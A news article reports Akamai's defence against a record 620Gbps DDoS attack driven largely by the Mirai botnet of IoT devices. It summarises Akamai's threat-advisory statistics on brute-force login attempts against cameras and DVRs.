On 20 September, Akamai successfully defended against a DDoS attack exceeding 620Gbps – nearly double that of the previous peak attack on its platform.
That attack generated interest in the role of IoT devices in DDoS attacks and the Mirai source code.
“Based on [an] investigation and what we know from the DDoS attack, we can confirm that the Mirai botnet was a major participant in the attack,” said Akamai.
“While there may have been at least one other botnet involved, we cannot confirm that the attacks were coordinated.”
Akamai said it has been tracking the botnet for some time, and published a Threat Advisory on its dangers.
“The Threat Advisory detailed our examination of a known-vulnerable device in order to analyze trends in brute force login attacks on the Internet.”
“The device existed on a Public IP and had open ports for listening services such as Telnet, SSH, HTTP, SMTP, and more.”
“The first thing we observed was bots using default credentials associated with IoT and then we noticed commands that showed them attempting to load the malware.”
Akamai made the following observations:
- 100,000 login attempts were made from more than 1,800 IPs.
- The top source countries were China (64%), Colombia (13%), South Korea (6%), and Vietnam (6%).
- The most attacked protocols were SSH (57%) and Telnet (42%).
- The top usernames were root (75%), admin (10%), shell (6%), and sh (6%).
- The most common login attempts were for Internet-connected surveillance cameras and associated DVR units.
It said the attack was generated by a botnet that was comprised primarily of Internet of Things devices, such as security cameras and DVRs.
The attack also included a substantial amount of traffic connecting directly from the botnet to the target, rather than reflected and/or amplified traffic, as seen in recent large attacks using NTP and DNS vulnerabilities.